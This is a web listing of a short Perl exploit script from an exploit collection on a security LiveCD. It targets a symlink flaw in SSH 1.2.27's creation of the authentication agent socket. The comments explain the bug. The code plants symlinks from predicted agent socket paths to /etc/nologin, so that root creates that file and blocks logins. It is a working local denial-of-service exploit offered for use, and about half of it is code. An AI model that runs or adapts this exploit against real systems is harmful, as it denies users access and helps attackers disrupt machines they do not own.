home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ssh / openssh / socket-dos.pl < prev    next >
Perl Script  |  2005-02-12  |  1KB  |  38 lines
  1. #!/usr/bin/perl
  2. #
  3. #     vulnerable: SSH 1.2.27
  4. #
  5. # A vulnerability in SSH's creation of the authentication
  6. # agent UNIX domain socket allows local users to create a
  7. # UNIX  domain socket with  an arbitrary file name in the
  8. # system.
  9. #
  10. # SSH has  the concept of authentication proxying via the
  11. # SSH authentication agent. It allows for a basic kind of
  12. # Single Sign-On capability. The sshd daemon, ssh and ssh
  13. # -agent communicate via a UNIX domain socket normally of
  14. # the  form  '/tmp/ssh-<username>/agent-socket-<pid>'.
  15. #
  16. # SSH follows symbolic links while creating the socket as
  17. # root thus  allowing any local  users with ssh access to
  18. # create  a  socket  with  an  arbitrary  filename in the
  19. # system.
  20. #
  21. # Notice  that  this  will  not  work under all operating
  22. # systems. Some operating systems  do not follow symbolic
  23. # links during bind on UNIX domain  sockets. Linux 2.0.x,
  24. # Solaris 2.5.1  and  IRIX 6.5.2  do  not follow symbolic
  25. # links during bind(2). Linux 2.1.x does.
  26.  
  27. $pid = $$;
  28.  
  29. $whoami = `whoami`;
  30. chop($whoami);
  31. mkdir("/tmp/ssh-$whoami", 0700);
  32.  
  33. for ($i = $pid; $i < $pid+50; $i++)
  34. {
  35.   symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
  36. }
  37.  
  38. #                    www.hack.co.za           [23 May 2000]#